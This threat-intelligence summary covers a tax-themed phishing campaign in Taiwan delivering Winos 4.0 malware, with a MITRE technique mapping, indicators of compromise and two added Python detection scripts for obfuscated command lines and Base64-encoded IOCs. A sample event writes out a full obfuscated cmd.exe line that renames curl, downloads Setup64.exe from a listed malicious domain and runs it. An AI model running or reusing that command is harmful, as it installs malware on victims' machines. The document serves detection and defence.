FortiGuard Labs observed tax-themed phishing campaigns in Taiwan delivering Winos 4.0 (ValleyRat) via weaponized attachments, DLL sideloading, and BYOVD driver abuse to achieve persistence, privilege escalation, and remote control. Analysis links the activity and infrastructure to a specialized Silver Fox subgroup responsible for evolving, memory-resident plugin delivery and targeted defensive evasion. #Winos4.0 #SilverFox
Keypoints
- Attackers used localized tax and e-invoice lures to distribute Winos 4.0 (ValleyRat) via weaponized RAR/LNK archives and malicious download links.
- Delivery methods include malicious LNK downloaders, DLL sideloading through legitimate executables, and BYOVD (Bring Your Own Vulnerable Driver) using wsftprm.sys to obtain kernel privileges.
- Malicious scripts perform system binary masquerading (copying curl.exe to url.exe) and obfuscated cmd.exe commands to download and execute Setup64.exe from rotating domains and cloud-hosted URLs.
- Winos 4.0 implements a UAC bypass via Debug Object Hijacking, checks its privileges, loads drivers, enumerates and terminates a long list of security processes, and persists by storing its plugins in the registry and loading them straight into memory.
- The malware hides C2 using Base64 encoding and loads modular plugins (online/login/file management/screen/control) directly into memory to minimize disk footprints.
- Attribution ties the campaigns to Silver Fox through consistent registrant metadata, a recurring C2 (47.76.86.151), an observed MachineID, and reused project strings (e.g., 大馬專案), indicating organized development and ongoing operations.
MITRE Techniques
- [T1566 ] Phishing – Initial access via tax-themed spearphishing with weaponized attachments and links (‘tax audit notifications, tax filing software installers, and cloud-based e-invoice downloads.’)
- [T1204.002 ] User Execution: Malicious File – Victims are tricked to open a RAR containing a malicious LNK that initiates the infection (‘RAR archive named “taxIs_RX3001.rar,” which contains a benign decoy document and a malicious LNK file.’)
- [T1059.003 ] Command and Scripting Interpreter: Windows Command Shell – LNK invokes cmd.exe with obfuscated arguments to create directories, masquerade binaries, and download payloads (‘By calling cmd.exe, the attacker executes a series of obfuscated commands designed to download the next-stage payload… Arguments:/C md %public%501 & … -o %public%501Se^tup^64.exe …’)
- [T1105 ] Ingress Tool Transfer – Downloading of next-stage binaries and archives from attacker-controlled domains and cloud services (‘download an executable named Setup64.exe from the remote domain bqdrzbyq[.]cn’ and E-Invoice.rar from cloud hosts)
- [T1036 ] Masquerading – System binary masquerading and renaming legitimate utilities to evade filename-based detection (‘copying the legitimate system utility curl.exe to this new directory and renaming it to url.exe to bypass simple filename-based monitoring.’)
- [T1574.002 ] DLL Side-loading – Delivery of a malicious DLL that is loaded by a legitimate executable to execute code (‘delivers an archive containing a DLL that is sideloaded through a legitimate application.’)
- [T1547.006 ] Boot or Logon Autostart Execution: Kernel Modules and Extensions (formerly T1215, now retired) – Loading of a signed but vulnerable kernel-mode driver (wsftprm.sys) via BYOVD to gain kernel privileges; the privilege gain itself is better described by T1068 Exploitation for Privilege Escalation (‘core driver involved is wsftprm.sys … perform a Bring Your Own Vulnerable Driver (BYOVD) attack by dynamically obtaining Native APIs … to bypass standard service monitoring.’)
- [T1548.002 ] Abuse Elevation Control Mechanism: Bypass User Account Control – UAC bypass via Debug Object Hijacking to elevate without prompting the user (‘calls BypassUACViaDebugObject, a technique that combines RPC AppInfo service calls with Debug Object Hijacking … computerdefaults.exe can elevate its thread to administrator level without triggering a UAC prompt.’)
- [T1562.001 ] Impair Defenses: Disable or Modify Tools – Malware enumerates and terminates a hardcoded list of security processes to create a clean environment (‘monitoring loop to cross-reference active processes against a hardcoded list of security products… Terminating these processes achieves a clean environment for Winos 4.0 to persist’).
- [T1071.001 ] Application Layer Protocol: Web Protocols – C2 communications and module retrieval over web protocols, with C2 hidden via Base64 (‘Winos 4.0 hides its C2 address, 47[.]76[.]86[.]151, using Base64 encoding … After verifying the system version, it connects to its C2 to load the core component’).
- [T1027 ] Obfuscated Files or Information – Use of obfuscated command strings and multiple Base64-encoded data fields to conceal driver and plugin loading (‘Its data fields contain numerous Base64-encoded strings used to load drivers and target security software’ and use of obfuscated command fragments like c^u^rl.e^x^e).
- [T1057 ] Process Discovery – Active process monitoring to identify and react to security products (‘enters a monitoring loop to cross-reference active processes against a hardcoded list of security products.’)
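The LNK stage above is detectable from process-creation telemetry alone: caret-escaped cmd.exe arguments, a copy of curl.exe under a new name, and a download into %public% are each unusual on their own and damning together. The following detection logic is an added example, not code from the FortiGuard report; the sample events are constructed to resemble the quoted fragment (the exact paths and the `%public%\501` directory are assumptions), and the IOC sets are taken from this page.

```python
import re
from urllib.parse import urlparse

# IOCs from this page (domains refanged for matching against real logs).
IOC_DOMAINS = {"bqdrzbyq.cn", "twtaxgo.cn"}
IOC_FILENAMES = {"setup64.exe", "taxis_rx3001.rar", "wsftprm.sys"}

# Constructed sample process-creation events (not from the report).  The first
# command line mirrors the obfuscated LNK arguments quoted above; the second is
# a benign copy for contrast.  Paths and the 501 directory name are assumptions.
SAMPLE_EVENTS = [
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": (r"cmd.exe /C md %public%\501 & "
                 r"copy %windir%\System32\c^u^rl.e^x^e %public%\501\url.exe & "
                 r"%public%\501\url.exe -o %public%\501\Se^tup^64.exe "
                 r"http://bqdrzbyq.cn/Setup64.exe & start %public%\501\Setup64.exe")},
    {"image": r"C:\Windows\System32\cmd.exe",
     "cmdline": r"cmd.exe /C copy report.docx %public%\backup\report.docx"},
]


def decaret(cmd: str) -> str:
    """Strip cmd.exe caret escapes: '^x' -> 'x', so c^u^rl.e^x^e -> curl.exe.
    Assumption: carets inside double quotes are treated the same way (cmd.exe
    keeps them literal there, so quoted paths may over-decode slightly)."""
    out, i = [], 0
    while i < len(cmd):
        if cmd[i] == "^" and i + 1 < len(cmd):
            out.append(cmd[i + 1])
            i += 2
        else:
            out.append(cmd[i])
            i += 1
    return "".join(out)


_COPY = re.compile(r"\b(?:copy|xcopy|move|ren(?:ame)?)\s+(\S+)\s+(\S+)", re.I)
_OUT = re.compile(r"\s-o\s+(\S+)", re.I)
_URL = re.compile(r"https?://[^\s\"']+", re.I)


def analyze(cmdline: str) -> dict:
    """Deobfuscate a command line and return the detection findings for it."""
    clean = decaret(cmdline)
    findings = []
    if clean != cmdline:
        findings.append("caret_obfuscation")
    # curl.exe copied or renamed to anything that is not curl.exe (T1036).
    for src, dst in _COPY.findall(clean):
        if src.lower().endswith("curl.exe") and not dst.lower().endswith("curl.exe"):
            findings.append("curl_masquerade")
    # An executable written into %public% via curl's -o switch (T1105).
    for out in _OUT.findall(clean):
        if out.lower().startswith("%public%") and out.lower().endswith(".exe"):
            findings.append("public_dir_download")
    # Known distribution domains and artefact names from the IOC list.
    for url in _URL.findall(clean):
        host = (urlparse(url).hostname or "").lower()
        if host in IOC_DOMAINS:
            findings.append("ioc_domain:" + host)
    for name in sorted(IOC_FILENAMES):
        if name in clean.lower():
            findings.append("ioc_filename:" + name)
    return {"deobfuscated": clean, "findings": findings}


def scan(events):
    """Return only the events that produced at least one finding."""
    hits = []
    for ev in events:
        result = analyze(ev["cmdline"])
        if result["findings"]:
            hits.append({**ev, **result})
    return hits


if __name__ == "__main__":
    for hit in scan(SAMPLE_EVENTS):
        print(hit["deobfuscated"])
        print("  ->", ", ".join(hit["findings"]))
```

Deobfuscating before matching matters: a rule that looks for the literal string `curl.exe` never fires on `c^u^rl.e^x^e`, while one that looks at the process image name never fires once the binary has been copied to `url.exe`. The copy-then-rename check is the one that survives both tricks.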
Indicators of Compromise
- [Domains ] Hosting and distribution infrastructure – bqdrzbyq[.]cn, twtaxgo[.]cn, and 9 more domains
- [IP Address ] C2 server – 47[.]76[.]86[.]151
- [URLs ] Cloud-hosted download links used in phishing – hxxps://twmoi2002.tos-cn-shanghai.volces[.]com/E-Invoice.rar, hxxps://twtaxgo[.]cn/uploads/20260129/taxIs_RX3001.7z, and 1 more URL
- [File Names ] Delivered artifacts and driver – taxIs_RX3001.rar, Setup64.exe, wsftprm.sys
- [SHA256 ] Known malicious file hashes – 64ee7a2e6259286311c8ba1c7b6d30e1e52fe78befcfd1b71b291c788f3e3e6a (Setup.exe), 156f31b37ee0d6e7f87cdc94dcd2d3b084b2e15da08bd8588e17d6bdc43159fe (AISafeSDK64.dll)
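Because Winos 4.0 keeps its C2 address and its driver/security-product strings Base64-encoded, and parks plugins in the registry rather than on disk, a plain string search for the IOCs above misses them. The scanner below is an added example (not FortiGuard's tooling): it pulls every Base64-looking run out of an arbitrary blob such as a registry value export or a memory dump, decodes the ones that yield printable text, and matches the result against the IOC set on this page. The sample blob is constructed; the only real-looking field in it is the Base64 form of the listed C2 IP.

```python
import base64
import re

# IOCs from this page (refanged).
IOCS = {"47.76.86.151", "bqdrzbyq.cn", "twtaxgo.cn", "wsftprm.sys"}

# Constructed sample "config blob" (not a real Winos 4.0 sample): field
# separators and layout are assumptions.  "NDcuNzYuODYuMTUx" is the Base64
# encoding of 47.76.86.151; the other fields are a Base64 driver name, a
# plain-text field, and a Base64 run of non-printable bytes as a decoy.
SAMPLE_BLOB = b"|".join([
    b"cfg",
    b"NDcuNzYuODYuMTUx",
    base64.b64encode(b"wsftprm.sys"),
    b"plain_text_field",
    base64.b64encode(bytes(range(16))),
])

# Base64 alphabet runs of at least 8 characters, with optional padding.
_B64 = re.compile(rb"[A-Za-z0-9+/]{8,}={0,2}")


def decode_candidates(blob: bytes):
    """Yield (encoded, decoded_text) for every Base64-looking run that decodes
    cleanly to printable ASCII.  Runs with bad length or binary content are
    skipped, so plain words that happen to fit the alphabet drop out."""
    for m in _B64.finditer(blob):
        tok = m.group(0)
        padded = tok + b"=" * ((-len(tok)) % 4)   # repair stripped padding
        try:
            raw = base64.b64decode(padded, validate=True)
            text = raw.decode("ascii")
        except (ValueError, UnicodeDecodeError):  # binascii.Error is a ValueError
            continue
        if text and text.isprintable():
            yield tok.decode("ascii"), text


def find_encoded_iocs(blob: bytes):
    """Return (ioc, encoded_form, decoded_text) for every encoded IOC found."""
    hits = []
    for enc, dec in decode_candidates(blob):
        for ioc in sorted(IOCS):
            if ioc in dec:
                hits.append((ioc, enc, dec))
    return hits


if __name__ == "__main__":
    for ioc, enc, dec in find_encoded_iocs(SAMPLE_BLOB):
        print(f"{ioc:<16} encoded as {enc} (decodes to {dec!r})")
```

Adding the Base64 forms of the IOCs to a YARA rule or an EDR string search is the cheap equivalent of this scan; the decode-everything approach is slower but also catches encodings with different offsets, which a fixed-string rule cannot.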